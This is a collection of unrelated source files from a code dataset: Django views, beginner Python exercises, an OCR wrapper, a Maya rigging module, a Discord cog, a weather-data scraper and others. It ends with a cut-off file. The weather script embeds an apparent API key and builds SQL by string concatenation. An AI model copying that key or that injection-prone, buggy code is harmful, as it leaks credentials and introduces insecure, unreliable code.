+{"seq_id":"74564044","text":"import datetime\n\nfrom django.http import JsonResponse\n\nfrom apps.bot.APIs.YandexGeoAPI import YandexGeoAPI\nfrom apps.bot.classes.bots.CommonBot import get_bot_by_platform\nfrom apps.bot.classes.common.CommonMethods import localize_datetime\nfrom apps.bot.models import Users\nfrom apps.db_logger.models import MovementLog\n\n\ndef json_response(params):\n    return JsonResponse(params, json_dumps_params={'ensure_ascii': False})\n\n\ndef get_somewhere(lat, lon):\n    yandexgeo_api = YandexGeoAPI()\n    address = yandexgeo_api.get_address(lat, lon)\n\n    if address is not None:\n        msg = f\"Я нахожусь примерно тут:\\n\" \\\n              f\"{address}\\n\"\n    else:\n        msg = \"\"\n    msg += f\"Позиция на карте:\\n\" \\\n           f\"https://yandex.ru/maps/?ll={lon}%2C{lat}&mode=search&text={lat}%2C%20{lon}&z=16\\n\"\n    return msg\n\n\ndef get_another_position(author, where):\n    positions = {\n        \"home\": {0: \"Выхожу из дома\", 1: \"Я дома\", \"count\": 0},\n        \"work\": {0: \"Я на работе\", 1: \"Выхожу с работы\", \"count\": 0},\n        \"university\": {0: \"Я в универе\", 1: \"Выхожу из универа\", \"count\": 0},\n    }\n\n    today = localize_datetime(datetime.datetime.utcnow(), author.city.timezone.name)\n    today_logs = MovementLog.objects.filter(date__year=today.year, date__month=today.month, date__day=today.day,\n                                            author=author)\n    for today_log in today_logs:\n        if today_log.event in positions:\n            positions[today_log.event]['count'] += 1\n    msg = positions[where][positions[where]['count'] % 2]\n    return msg\n\n\ndef where_is_me(request):\n    log = MovementLog()\n\n    where = request.GET.get('where', None)\n    if not where:\n        log.msg = \"Where is None\"\n        log.save()\n        return json_response({'status': 'error', 'message': log.msg})\n    log.event = where\n\n    imei = request.GET.get('imei', None)\n    if not imei:\n        log.msg = \"IMEI is None\"\n        log.save()\n        return json_response({'status': 'error', 'message': log.msg})\n    log.imei = imei\n\n    author = Users.objects.filter(imei=imei).first()\n    if not author:\n        log.msg = \"Author is None\"\n        log.save()\n        return json_response({'status': 'error', 'message': log.msg})\n    log.author = author\n\n    recipients = author.send_notify_to.all()\n    if not recipients:\n        log.msg = \"Recipients is None\"\n        log.save()\n        return json_response({'status': 'error', 'message': log.msg})\n\n    if where == 'somewhere':\n        lat = request.GET.get('lat', None)\n        lon = request.GET.get('lon', None)\n        if not lat or not lon:\n            log.msg = \"Lat or Lon is None\"\n            log.save()\n            return json_response({'status': 'error', 'message': log.msg})\n        msg = get_somewhere(lat, lon)\n    elif where in ['home', 'work', 'university']:\n        msg = get_another_position(author, where)\n    
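# Unknown 'where' values fall through to the error response below\n    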
else:\n        log.msg = \"Не найдено такое событие(?)\"\n        log.save()\n        return json_response({'status': 'error', 'message': log.msg})\n\n    msg += \"\\n%s\" % author.name\n    log.msg = msg\n    log.save()\n    for recipient in recipients:\n        bot = get_bot_by_platform(recipient.get_platform_enum())()\n        bot.parse_and_send_msgs(recipient.user_id, msg)\n    log.success = True\n    return json_response({'status': 'success'})\n","sub_path":"apps/bot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"252479221","text":"def estCondicional01():\n    #Define variables and other items\n    print(\"Ejemplo estructura Condicional en Python\")\n    montoP=0\n    #Input data\n    cantidadX=int(input(\"Ingrese la cantidad de lapices:\"))\n    #Process\n    if cantidadX>=1000:\n        montoP=cantidadX*0.80\n    else:\n        montoP=cantidadX*0.90 \n    #Output data\n    print(\"El monto a pagar es:\", montoP)\ndef estCondicional02():\n    #Define variables and other items\n    print(\"Ejemplo estructura Condicional en Python 02\")\n    montoP=0\n    #Input data\n    cantidadX=int(input(\"Ingrese la cantidad de personas:\"))\n    #Process\n    if cantidadX<=200:\n        montoP=cantidadX*95\n    elif cantidadX>200 and cantidadX<=300:\n        montoP=cantidadX*85\n    else:\n        montoP=cantidadX*75\n    #Output data\n    print(\"El monto a pagar es:\", montoP)\ndef bonoDocente():\n    #Define variables\n    bonoObtenido=0.0\n    #Input data\n    salarioMinimo=float(input(\"Ingrese el salario minimo:\"))\n    puntuacionObtenida=float(input(\"Ingrese la puntuación que ha obtenido:\"))\n    #Process\n    if puntuacionObtenida<=100 and puntuacionObtenida>=0:\n        bonoObtenido=salarioMinimo\n    elif puntuacionObtenida >=101 and puntuacionObtenida<=150:\n        bonoObtenido=salarioMinimo*2\n    elif puntuacionObtenida>150:\n        bonoObtenido=salarioMinimo*3 \n    #Output data\n    print(\"El docente obtendra un bono de:\", bonoObtenido )\n\n\ndef paquetesJDQC():\n    #Define variables\n    resultPaqueteDmp=\"\"\n    #Input data\n    montoRvDiDmpc=float(input(\"Ingrese el monto que recibe en diciembre:\"))\n    #Process\n    if montoRvDiDmpc>=50000:\n        resultPaqueteDmp=\"Paquete A\"\n    elif montoRvDiDmpc>=20000 and montoRvDiDmpc<50000:\n        resultPaqueteDmp=\"Paquete B\"\n    elif montoRvDiDmpc>=10000 and montoRvDiDmpc<20000:\n        resultPaqueteDmp=\"Paquete C\"\n    else:\n        resultPaqueteDmp=\"Paquete D\"\n    #Output data\n    print(\"La persona comprara el: \", resultPaqueteDmp)\n\ndef paquetes():\n    #Define variables\n    resultPaquete=\"\"\n    #Input data\n    montoRvDic=float(input(\"Ingrese el monto que recibe en diciembre:\"))\n    #Process\n    if montoRvDic>=50000:\n        resultPaquete=\"Paquete A\"\n    elif montoRvDic>=20000 and montoRvDic<50000:\n        resultPaquete=\"Paquete B\"\n    elif montoRvDic>=10000 and montoRvDic<20000:\n        resultPaquete=\"Paquete C\"\n    else:\n        resultPaquete=\"Paquete D\"\n    #Output data\n    print(\"La persona comprara el: \", resultPaquete)\n\n\n#estCondicional02()\n#estCondicional01()\n#bonoDocente()\n\npaquetesJDQC()\n\n\n#estCondicional01()\n","sub_path":"est-condicional/EstCondicional.py","file_name":"EstCondicional.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"332290726","text":"import subprocess\n\n\nclass Tesseract:\n    def __init__(self, language=\"deu\", executable=\"/usr/bin/tesseract\"):\n        self.language = language\n        self.executable = executable\n\n    def extract_text(self, input_file):\n        return self._extract(input_file, False)\n\n    
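# Hypothetical usage sketch (illustrative path, not from the original file):\n    #   text = Tesseract(language=\"deu\").extract_text(\"/tmp/scan.png\")\n    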
def _extract(self, input_file, hocr):\n        # --psm 1 = Automatic page segmentation with OSD. (Orientation and script detection)\n        cmd = [\n            self.executable,\n            input_file,\n            \"stdout\",\n            \"-l\",\n            self.language,\n            \"--psm\", \"1\"\n        ]\n\n        if hocr:\n            cmd.append(\"hocr\")\n\n        result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=None)\n\n        return result.stdout.decode()\n\n","sub_path":"scanstotext/Tesseract.py","file_name":"Tesseract.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"260550393","text":"#\nimport os\nimport ShareYourSystem\nfrom ShareYourSystem.Functions import Tool\nfrom ShareYourSystem.Classors import Classor,Representer\nfrom ShareYourSystem.Functers import Argumenter\nfrom ShareYourSystem.Object import Readmer\nimport importlib\nBaseModule=importlib.import_module(\"ShareYourSystem.Object.Directer\")\nDecorationModule=importlib.import_module(\"ShareYourSystem.Classors.Classer\")\n#\n\n#\nBaseNameString=Classor.getNameStringWithModuleString(BaseModule.__name__)\nBaseClass=getattr(\n\t\t\t\t\t\tBaseModule,\n\t\t\t\t\t\tClassor.getClassStringWithNameString(BaseNameString)\n\t\t\t\t\t\t)\nDecorationNameString=Classor.getNameStringWithModuleString(DecorationModule.__name__)\nDecorationClass=getattr(\n\t\t\t\t\t\t\tDecorationModule,\n\t\t\t\t\t\t\tClassor.getClassStringWithNameString(DecorationNameString)\n\t\t\t\t\t\t\t)\n#\n\n#\n@DecorationClass()\nclass InstallerClass(BaseClass):\n\t\n\t#@Hooker.HookerClass(**{'HookingAfterVariablesList':[{'CallingVariable':BaseClass.init}]})\n\tdef __init__(self,\n\t\t\t\t\t\t_InstallingPathString=\"\",\n\t\t\t\t\t\t_InstalledReadmerPointer=None,\n\t\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t\t):\n\n\t\t#Call the parent __init__ method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\t@Argumenter.ArgumenterClass()\n\tdef install(self,_PathString=None,**_KwargVariablesDict):\n\n\t\t#Check\n\t\tif self.InstallingPathString==\"\":\n\t\t\tself.InstallingPathString=os.getcwd().split('ShareYourSystem')[0]+'ShareYourSystem/'\n\n\t\t#Debug\n\t\t'''\n\t\tself.debug(('self.',self,['InstallingPathString']))\n\t\t'''\n\n\t\t#Check\n\t\tif self.InstalledReadmerPointer==None:\n\t\t\tself.InstalledReadmerPointer=Readmer.ReadmerClass()\n\n\t\t#direct the document command\n\t\tself.direct(\n\t\t\t\t\t\tlambda _LiargVariablesList,_FolderPathString,_FileKeyStringsList:\n\t\t\t\t\t\tself.InstalledReadmerPointer.readme(\n\t\t\t\t\t\t\t**{\n\t\t\t\t\t\t\t\t'DocumentingNameString':_FolderPathString.split('/')[-2],\n\t\t\t\t\t\t\t\t'FolderingPathString':_FolderPathString\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t) if '__init__.py' in _FileKeyStringsList else None,\n\t\t\t\t\t\t[],\n\t\t\t\t\t\t**{'FolderingPathString':self.InstallingPathString}\n\t\t\t\t\t)\n\n\t\t#Return self\n\t\treturn self\n\t\n#\n\n","sub_path":"Install/build/lib/ShareYourSystem/Object/Installer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"20901682","text":"\"\"\"People enrolled in retirement by adult\nseniority must be 60 years old or more\nand have 25 or more years of seniority at their job.\nDetermine which type of retirement a person\nwill be enrolled in.\"\"\"\n\nedad= int(input(\"Ingrese su edad: \"))\nempleo= int(input(\"¿Cuántos años de antiguedad tiene su empresa? 
\"))\n\nif edad>=60 and empleo< 25:\n\tprint(\"Usted quedará inscrito en la jubilación por edad\")\nelif edad <60 and empleo>=25:\n\tprint(\"Usted quedará inscrito a la jubilación por antiguedad joven\")\nelif edad>=60 and empleo>=25:\n\tprint(\"Usted quedaráinscrito a la jubilación por antiguedad adulta\")\nelse:\n\tprint(\"Usted aún no se jubila\")","sub_path":"Semana 2/Sesion 4/Mío.py","file_name":"Mío.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"72614993","text":"from django.urls import path, include\nfrom .auth import views\n\nurlpatterns = [\n path('account/', include('account.auth.urls')),\n path('settings/', include('account.settings.urls')),\n path('u/', include('account.users.urls')),\n # django-social-authのエラーハンドリング\n path('complete//', views.social_auth_complete)\n]\n","sub_path":"web/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"532137737","text":"import requests\nimport sqlite3 as lite\nimport datetime \napi_key = \"<31de5d7b68d2b90e5f611ff0018e4f10>\"\nurl = 'https://api.forecast.io/forecast/' + api_key\ncities = {\"Atlanta\": '33.762909,-84.422675',\n \"Austin\": '30.303936,-97.754355',\n \"Boston\": '42.331960,-71.020173',\n \"Chicago\": '41.837551,-87.681844',\n \"Cleveland\": '41.478462,-81.679435'\n }\nend_date = datetime.datetime.now()\ncon = lite.connect('weather.db')\ncur = con.cursor()\ncities.keys()\n#with con: \n#\tcur.execute('CREATE TABLE daily_temp ( day_of_reading INT, city1 REAL, city2 REAL, city3 REAL, city4 REAL, city5 REAL);')\nquery_date = end_date - datetime.timedelta(days=30)\nwhile con:\n\twhile query_date < end_date:\n\t\tcur.execute(\"INSERT INTO daily_temp(day_of_reading) VALUES (?)\", (str(query_date.strftime('%Y-%m-%dT%H:%M:%S')),))\n\t\tquery_date += datetime.timedelta(days=1)\nfor k,v in cities.iteritems():\n\tquery_date = end_date - datetime.timedelta(days=30)\n\twhile query_date < end_date:\n\t\tr = requests.get(url + v + ',' + query_date.strftime('%Y-%m-%dT12:00:00'))\n\t\twith con:\n\t\t\tcur.execute('UPDATE daily_temp SET ' + k + ' = ' + str(r.json()['daily']['data'][0]['temperatureMax']) + ' WHERE day_of_reading = ' + query_date.strftime('%Y-%m-%dT%H:%M:%S'))\n\t\tquery_date += datetime.timedelta(days=1)\n\tcon.close()\n","sub_path":"Storing_Temp_Data_v2.py","file_name":"Storing_Temp_Data_v2.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"282340404","text":"from django.http.response import HttpResponseRedirect\nfrom django.views.generic.base import TemplateView\nfrom teacher.models import Subject, Teacher\nfrom django.shortcuts import render\nfrom django.views.generic import ListView\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.urls import reverse_lazy\nimport csv\n\n\nclass Index(LoginRequiredMixin, ListView):\n template_name = \"home/index.html\"\n context_object_name = \"subjects\"\n queryset = Subject.objects.all()\n paginate_by = 20\n\n\nclass BulkUpload(UserPassesTestMixin, TemplateView):\n template_name = \"home/bulk_upload.html\"\n\n def post(self, request, *args, **kwargs):\n subject_models = []\n data_to_save = []\n _subject_filter = set()\n\n # process uploaded file\n csv_file = request.FILES.get(\"file\")\n csv_file = 
csv_file.read().decode('utf-8').splitlines()\n\n rows = csv.DictReader(csv_file)\n\n for row in rows:\n first_name = row.get(\"First Name\")\n last_name = row.get(\"Last Name\")\n email = row.get(\"Email Address\")\n\n # check if we have required fields before processing. saves unnecessary processing\n if (first_name and last_name and email):\n profile_pic = row.get(\"Profile picture\")\n phone_no = row.get(\"Phone Number\")\n room_no = row.get(\"Room Number\")\n subjects = [s.strip() for s in row.get(\"Subjects taught\", '').lower().split(\",\")]\n\n for subject in subjects:\n if subject == \"maths\":\n subject = \"mathematics\"\n\n if subject and not subject in _subject_filter: \n subject_models.append(Subject(name=subject))\n _subject_filter.add(subject)\n\n data_to_save.append(\n {\n \"first_name\": first_name, \n \"last_name\": last_name, \n \"profile_pic\": profile_pic, \n \"email\": email, \n \"phone_no\": phone_no,\n \"room_no\": room_no,\n \"subjects_taught\": subjects[:5] # max item to save is 5\n })\n\n Subject.objects.bulk_create(subject_models, ignore_conflicts=True)\n all_subjects = Subject.objects.all()\n\n for data in data_to_save:\n subjects_taught = all_subjects.filter(name__in=data[\"subjects_taught\"])\n\n t, _ = Teacher.objects.get_or_create(\n email=data[\"email\"],\n defaults={\n \"first_name\": data[\"first_name\"],\n \"last_name\": data[\"last_name\"],\n \"phone_no\": data[\"phone_no\"],\n \"room_no\": data[\"room_no\"],\n \"profile_pic\": data[\"profile_pic\"],\n }\n )\n t.subjects_taught.set(subjects_taught)\n\n\n return HttpResponseRedirect(reverse_lazy('teacher:index'))\n\n\n def dispatch(self, request, *args, **kwargs):\n user_test_result = self.request.user.is_superuser\n\n if not user_test_result:\n return HttpResponseRedirect(reverse_lazy('home:index'))\n return super().dispatch(request, *args, **kwargs)\n\n def test_func(self):\n return self.request.user.is_superuser","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"250378992","text":"from __future__ import absolute_import\n\nimport re\n\nimport maya.cmds as cmds\n\nfrom rigging.library.utils import controller as rlu_controller, transform as rlu_transform\nfrom rigging.tools import pythonVersion as rt_pythonVersion, utils as rt_utils\n\n\nclass Build:\n def __init__(self,\n lid01_up, lid01_low,\n lid05_up, lid05_low,\n lid_up_joint_bind01_grp_offset,\n lid_low_joint_bind01_grp_offset,\n lid_up_joint_bind05_grp_offset,\n lid_low_joint_bind05_grp_offset,\n scale,\n side_RGT,\n side_LFT,\n lid_up_ctrl_bind01_grp_zro,\n lid_low_ctrl_bind01_grp_zro,\n lid_up_ctrl_bind05_grp_zro,\n lid_low_ctrl_bind05_grp_zro,\n prefix_name_in,\n prefix_name_out,\n side,\n ctrl_shape,\n ctrl_color,\n suffix_controller,\n lid_out=False):\n\n # ==================================================================================================================\n # CORNER CONTROLLER\n # ==================================================================================================================\n # controller in corner\n lid_corner_in_ctrl = self.lid_corner_ctrl(match_pos_one=lid01_up,\n match_pos_two=lid01_low,\n prefix=prefix_name_in,\n scale=scale,\n side=side,\n ctrl_shape=ctrl_shape,\n ctrl_color=ctrl_color,\n add_attr=lid_out,\n suffix_controller=suffix_controller)\n\n # controller in corner\n lid_corner_out_ctrl = self.lid_corner_ctrl(match_pos_one=lid05_up,\n 
match_pos_two=lid05_low,\n prefix=prefix_name_out,\n scale=scale,\n side=side,\n ctrl_shape=ctrl_shape,\n ctrl_color=ctrl_color,\n add_attr=lid_out,\n suffix_controller=suffix_controller)\n\n self.lid_in_grp = lid_corner_in_ctrl[1]\n self.lid_out_grp = lid_corner_out_ctrl[1]\n self.lid_in_ctrl = lid_corner_in_ctrl[0]\n self.lid_out_ctrl = lid_corner_out_ctrl[0]\n\n position_lid_corner_out = cmds.xform(lid_corner_out_ctrl[0], ws=1, q=1, t=1)[0]\n if position_lid_corner_out > 0:\n # parent constraint corner grp bind jnt\n rt_utils.connect_attr_translate_rotate(lid_corner_in_ctrl[0], lid_up_joint_bind01_grp_offset)\n rt_utils.connect_attr_translate_rotate(lid_corner_in_ctrl[0], lid_low_joint_bind01_grp_offset)\n rt_utils.connect_attr_translate_rotate(lid_corner_out_ctrl[0], lid_up_joint_bind05_grp_offset)\n rt_utils.connect_attr_translate_rotate(lid_corner_out_ctrl[0], lid_low_joint_bind05_grp_offset)\n else:\n self.corner_reverse_node(side_RGT, side_LFT, lidCornerCtrl=lid_corner_out_ctrl[0], side=side,\n lidCornerName=prefix_name_out,\n targetUp=lid_up_joint_bind05_grp_offset, targetLow=lid_low_joint_bind05_grp_offset)\n\n self.corner_reverse_node(side_RGT, side_LFT, lidCornerCtrl=lid_corner_in_ctrl[0], side=side,\n lidCornerName=prefix_name_in,\n targetUp=lid_up_joint_bind01_grp_offset, targetLow=lid_low_joint_bind01_grp_offset)\n\n # SHOW AND HIDE CONTROLLER CORNER\n if lid_out:\n # ADD ATTRIBUTE FOR LID OUT CONTROLLER\n cmds.connectAttr(lid_corner_in_ctrl[0] + '.%s' % lid_corner_in_ctrl[3],\n lid_up_ctrl_bind01_grp_zro + '.visibility')\n cmds.connectAttr(lid_corner_in_ctrl[0] + '.%s' % lid_corner_in_ctrl[3],\n lid_low_ctrl_bind01_grp_zro + '.visibility')\n cmds.connectAttr(lid_corner_out_ctrl[0] + '.%s' % lid_corner_out_ctrl[3],\n lid_up_ctrl_bind05_grp_zro + '.visibility')\n cmds.connectAttr(lid_corner_out_ctrl[0] + '.%s' % lid_corner_out_ctrl[3],\n lid_low_ctrl_bind05_grp_zro + '.visibility')\n\n # OFFSET GRP CONTROLLER\n self.lid_corner_in_ctrl_grp_offset = lid_corner_in_ctrl[2]\n self.lid_corner_out_ctrl_grp_offset = lid_corner_out_ctrl[2]\n # ==================================================================================================================\n # PARENT TO GROUP\n # ==================================================================================================================\n cmds.parent(lid_up_ctrl_bind01_grp_zro, lid_corner_in_ctrl[0])\n cmds.parent(lid_low_ctrl_bind01_grp_zro, lid_corner_in_ctrl[0])\n cmds.parent(lid_up_ctrl_bind05_grp_zro, lid_corner_out_ctrl[0])\n cmds.parent(lid_low_ctrl_bind05_grp_zro, lid_corner_out_ctrl[0])\n\n def reorder_number(self, prefix, side_RGT, side_LFT):\n # get the number\n new_prefix = rlu_transform.reposition_side(object=prefix, side_RGT=side_RGT, side_LFT=side_LFT)\n try:\n patterns = [r'\\d+']\n prefix_number = rt_utils.prefix_name(new_prefix)\n for p in patterns:\n prefix_number = re.findall(p, prefix_number)[0]\n except:\n prefix_number = ''\n\n # get the prefix without number\n prefix_no_number = rt_pythonVersion.translation_string(new_prefix)\n\n return prefix_no_number, prefix_number\n\n def corner_reverse_node(self, sideRGT, sideLFT, lidCornerCtrl, side, lidCornerName='', targetUp='', targetLow=''):\n newName, numberNew = self.reorder_number(prefix=lidCornerName, side_RGT=sideRGT, side_LFT=sideLFT)\n\n transRev = cmds.createNode('multiplyDivide', n=newName + 'Trans' + numberNew + side + '_mdn')\n rotRev = cmds.createNode('multiplyDivide', n=newName + 'Rot' + numberNew + side + '_mdn')\n cmds.connectAttr(lidCornerCtrl + 
'.translate', transRev + '.input1')\n cmds.setAttr(transRev + '.input2X', -1)\n\n cmds.connectAttr(lidCornerCtrl + '.rotate', rotRev + '.input1')\n cmds.setAttr(rotRev + '.input2Y', -1)\n cmds.setAttr(rotRev + '.input2Z', -1)\n\n cmds.connectAttr(transRev + '.output', targetUp + '.translate')\n cmds.connectAttr(rotRev + '.output', targetUp + '.rotate')\n cmds.connectAttr(transRev + '.output', targetLow + '.translate')\n cmds.connectAttr(rotRev + '.output', targetLow + '.rotate')\n\n def lid_corner_ctrl(self, match_pos_one, match_pos_two, prefix, scale, side, ctrl_shape, ctrl_color,\n suffix_controller,\n add_attr=False):\n corner_ctrl = rlu_controller.Control(match_obj_first_position=match_pos_one,\n match_obj_second_position=match_pos_two,\n prefix=prefix,\n shape=ctrl_shape, groups_ctrl=['Zro', 'Offset'],\n ctrl_size=scale * 0.07, suffix=suffix_controller,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side)\n\n # check position\n position_corner_ctrl = cmds.xform(corner_ctrl.control, ws=1, q=1, t=1)[0]\n\n # flipping the controller\n if position_corner_ctrl < 0:\n cmds.setAttr(corner_ctrl.parent_control[0] + '.scaleX', -1)\n\n self.control = corner_ctrl.control\n self.lid_corner_ctrl_grp = corner_ctrl.parent_control[0]\n self.lid_corner_ctrl_grp_offset = corner_ctrl.parent_control[1]\n\n # ADD ATTRIBUTE\n if add_attr:\n self.show_detail_ctrl = rt_utils.add_attribute(objects=[corner_ctrl.control], long_name=['showDetailCtrl'],\n attributeType=\"long\", min=0, max=1, dv=0, keyable=True)\n\n return corner_ctrl.control, corner_ctrl.parent_control[0], corner_ctrl.parent_control[\n 1], self.show_detail_ctrl\n\n else:\n return corner_ctrl.control, corner_ctrl.parent_control[0], corner_ctrl.parent_control[1]\n","sub_path":"rigging/library/base/face/lidCorner.py","file_name":"lidCorner.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"408608129","text":"# Create a Queue using List with no size limit.\n# Author : DC\n\nclass Queue:\n\n def __init__(self):\n self.queue = []\n\n def __str__(self):\n values = ([str(x) for x in self.queue])\n return ' '.join(values)\n\n def isEmpty(self):\n return self.queue == []\n\n def enqueue(self,value):\n self.queue.append(value)\n\n def dequeue(self):\n if self.isEmpty():\n print(\"The queue is empty.\")\n else:\n return self.queue.pop(0)\n\n def peek(self):\n if self.isEmpty():\n print(\"The queue is empty.\")\n else:\n return self.queue[0]\nif __name__ == '__main__':\n q = Queue()\n print(q.isEmpty())\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n print(q)\n print(\"Popped Item : \"+str(q.dequeue()))\n print(q)\n print(\"Peeked Item : \" + str(q.peek()))\n print(q)","sub_path":"queue/queueWOSizeLimit.py","file_name":"queueWOSizeLimit.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"11976995","text":"import ast\n\nfrom discord import Embed, TextChannel\nfrom discord.ext import commands\n\n\nclass EmbedCreator(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def embed(self, ctx, dict_str: str, channel: TextChannel = None):\n embed_dict = ast.literal_eval(dict_str)\n embed = Embed.from_dict(embed_dict)\n\n if channel is None:\n await ctx.send(embed=embed)\n return\n\n await channel.send(embed=embed)\n\n\ndef setup(bot):\n 
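# discord.py extension hook: load_extension calls this to register the cog\n    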
bot.add_cog(EmbedCreator(bot))\n","sub_path":"extensions/embed_creator.py","file_name":"embed_creator.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"647172483","text":"import click\n\nfrom globus_cli.parsing import common_options, endpoint_id_arg\nfrom globus_cli.safeio import FORMAT_TEXT_RECORD, FORMAT_TEXT_TABLE, formatted_print\nfrom globus_cli.services.transfer import get_endpoint_w_server_list\n\n\n@click.command(\"list\", help=\"List all servers belonging to an endpoint\")\n@common_options\n@endpoint_id_arg\ndef server_list(endpoint_id):\n    \"\"\"\n    Executor for `globus endpoint server list`\n    \"\"\"\n    # raises usage error on shares for us\n    endpoint, server_list = get_endpoint_w_server_list(endpoint_id)\n\n    if server_list == \"S3\":  # not GCS -- this is an S3 endpoint\n        server_list = {\"s3_url\": endpoint[\"s3_url\"]}\n        fields = [(\"S3 URL\", \"s3_url\")]\n        text_format = FORMAT_TEXT_RECORD\n    else:  # regular GCS host endpoint\n        fields = (\n            (\"ID\", \"id\"),\n            (\"URI\", lambda s: (s[\"uri\"] or \"none (Globus Connect Personal)\")),\n        )\n        text_format = FORMAT_TEXT_TABLE\n    formatted_print(server_list, text_format=text_format, fields=fields)\n","sub_path":"globus_cli/commands/endpoint/server/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"535945074","text":"__author__ = 'jullyt'\n#!/bin/python3\n\"\"\"Observe that its base and height are both equal to n,\nand the image is drawn using # symbols and spaces.\nThe last line is not preceded by any spaces.\nWrite a program that prints a staircase of size n.\"\"\"\n\"\"\"i = 1\n while i <= n:\n     new = i * '#'\n     i += 1\n     print(('{:>'+str(n)+'}').format(new))\"\"\"\nimport sys\n\ndef staircase(n):\n\n    for i in range (1,n+1):\n        print(('{:>'+str(n)+'}').format(i * '#'))\n\n    # Complete this function\n\nif __name__ == \"__main__\":\n    n = int(input().strip())\n    staircase(n)\n\n","sub_path":"staircase.py","file_name":"staircase.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"527041040","text":"from setuptools import setup\n\n__author__ = 'TRAN QUANG HUY'\n__copyright__ = 'Copyright (C) 2019, Intek Institute'\n__email__ = 'huy.tran@f4.intek.edu.vn'\n__license__ = 'MIT'\n__maintainer__ = 'TRAN QUANG HUY'\n__version__ = '1.0.6'\n__name__ = \"spritessheettquang97\"\n\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetup(\n    author=__author__,\n    author_email=__email__,\n    name= __name__,\n    copyright = __copyright__,\n    license = __license__,\n    maintainer = __maintainer__,\n    version = __version__,\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    packages=[\"spritessheettquang97\"],\n    include_package_data=True,\n    install_requires=[\n        \"numpy==1.18.1\",\n        \"Pillow==7.0.0 \",\n    ]\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"442589172","text":"import random as rd\nfrom builtins import len\n\nimport pandas as pd\n#number of rows generated in the .csv\nqt_loops = 2000\n\nAuditores = ['Ellie', 'Joel', 'Freeman', 'Breen','Kratos', 'Atreus']\n\nLinha = ['almox', 'produção', 'cofre', 'manuseio', 'perso', 'expedição', 'adm']\n\nItem 
= ['item1', 'item2', 'item3', 'item4', 'item5', 'item6', 'item7', 'item8', 'item9', 'item10']\n\nCategoria = ['Manuseio 01', 'Manuseio 02', 'Manuseio 03', 'Manuseio 04',\n'Linha 01', 'Linha 02', 'Linha 03', 'Linha 04', 'Produção', 'Expedição',\n'Roterização', 'BH 01', 'BH 02', 'BH 03', 'MX 26', 'Cofre',\n'DC 01', 'DC 02', 'NA']\n\nID = ['idA', 'idB', 'idC']\n\nCategoria = ['Não gerou arquivo de retorno', 'Conferência de material'\n, 'Perda de cartões', 'Manuseio errado'\n, 'Conferência de material'\n,'Falta de identificação'\n,'Material misturado'\n,'Duplicidade de cartões'\n,'Ordem de produção sem insumo'\n,'Produto misturado']\n\nimport random as rd\n\nData = []\n\nfor i in range(2000):\n    d = rd.randint(1, 31)\n    #m = rd.randint(1, 12)\n    m = '05'\n\n    if (d < 10):\n        d = str(d).zfill(2)\n    else:\n        d = str(d)\n\n    #if (m < 10):\n    #    m = str(m).zfill(2)\n    #else:\n    #    m = str(m)\n\n    D = '2020-' + m + '-' + d\n    Data.append(D)\n\nHora = []\n\nfor i in range(2000):\n    hora = rd.randint(0, 23)\n    minuto = rd.randint(0, 59)\n    segundos = rd.randint(0, 59)\n\n    if (hora < 10):\n        hora = str(hora).zfill(2)\n    else:\n        hora = str(hora)\n\n    if (minuto < 10):\n        minuto = str(minuto).zfill(2)\n    else:\n        minuto = str(minuto)\n\n    if(segundos < 10):\n        segundos = str(segundos).zfill(2)\n    else:\n        segundos = str(segundos)\n\n    H = hora + ':' + minuto + ':' + segundos\n    Hora.append(H)\n\nTurno = ['Diurno A', 'Diurno B', 'Noturno A', 'Noturno B']\n\nstatus = ['OK', 'NOK']\n\ndict_audit = []\nfor i in range(qt_loops):\n    dict_audit.append(Auditores[rd.randint(0, len(Auditores) - 1)])\n\ndict_linha = []\nfor i2 in range(qt_loops):\n    dict_linha.append(Linha[rd.randint(0, len(Linha) - 1)])\n\ndia = ['SEG', 'TER', 